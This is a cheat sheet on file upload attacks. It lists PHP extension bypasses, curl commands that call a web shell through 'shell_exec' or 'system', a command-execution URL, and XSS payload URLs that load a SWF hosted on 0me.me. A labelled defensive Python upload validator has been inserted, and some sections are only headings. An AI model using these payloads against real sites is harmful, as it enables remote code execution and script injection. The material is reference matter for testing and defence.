# Upload
Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.
## Exploits
### Image Tragik
* HTTP Request
* Reverse Shell
* Touch command
### PHP Extension
* `.php`
* Less known extensions: `.pht`, `.pgif`, `.phtml`, `.shtml`
* Double extensions: `.jpeg.php`, `.png.php`
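As an added, defender-side example (not code from the original page): a Python upload check that allowlists image extensions instead of blocklisting the PHP ones above, checks every dot-separated suffix so the double extensions fail, verifies the file's magic bytes against the declared type, and stores the file under a server-chosen name. The allowlist, the class names and the sample bytes are constructed for this example.

```python
import os
import secrets

# Constructed allowlist for this example: the only extensions the handler will
# store, each with the magic bytes a genuine file of that type starts with.
ALLOWED_TYPES = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

class UploadRejected(ValueError):
    """Raised with a reason when an upload fails validation."""

def validate_upload(filename: str, data: bytes) -> str:
    """Return the canonical extension of an acceptable upload, else raise.
    Every dot-separated suffix is checked against the allowlist, so
    'shell.jpeg.php' fails on '.php' instead of passing on '.jpeg', and
    .pht/.phtml/.shtml/.pgif fail because they are simply not listed.
    """
    # A client-supplied name never legitimately carries separators or NULs.
    if not filename or any(c in filename for c in "/\\\x00"):
        raise UploadRejected("illegal characters in filename")
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) < 2 or not parts[0]:
        raise UploadRejected("missing or empty extension")
    suffixes = ["." + p for p in parts[1:]]
    for suffix in suffixes:
        if suffix not in ALLOWED_TYPES:
            raise UploadRejected(f"extension {suffix!r} is not allowed")
    ext = suffixes[-1]
    # Declared type must match the bytes: a .png starting with '<?php' fails.
    # A valid image carrying a payload in its metadata is NOT caught here.
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        raise UploadRejected("file content does not match its extension")
    return ext

def is_accepted(filename: str, data: bytes) -> bool:
    """True if validate_upload() would accept the file, False otherwise."""
    try:
        validate_upload(filename, data)
        return True
    except UploadRejected:
        return False

def storage_name(ext: str) -> str:
    """Server-chosen on-disk name; the client's filename is discarded entirely."""
    return secrets.token_hex(16) + ext
```

The magic-byte check does not stop the resize-surviving image polyglots covered in the next sections, so the stored file must also live where the web server never hands it to a script handler; re-encoding the image server-side strips most embedded payloads.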
### PNG Bypass a resize
Upload the picture and use a local file inclusion.

The payload is used by specifying `$_GET[0]` as the PHP function to call (`shell_exec` or `system`) and passing a `$_POST[1]` parameter with the shell command to execute.

```bash
curl 'http://localhost/b.php?0=shell_exec' --data "1='ls'"
curl 'http://localhost/test.php?0=system' --data "1='ls'"
```
### JPG Bypass a resize
Upload the picture and use a local file inclusion.

```text
http://localhost/test.php?c=ls
```
### XSS via SWF
As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to present a SWF file that you can use in your PoCs.
This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either.
```text
Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){window.open('?js=history.go(-1)','_self');}
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open('invalidfileinvalidfileinvalidfile','target');setTimeout('alert(w.document.location);w.close();',1);
```
### .htaccess
A .htaccess file is a way to configure the details of your website without needing to alter the server config files.
## References
* Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil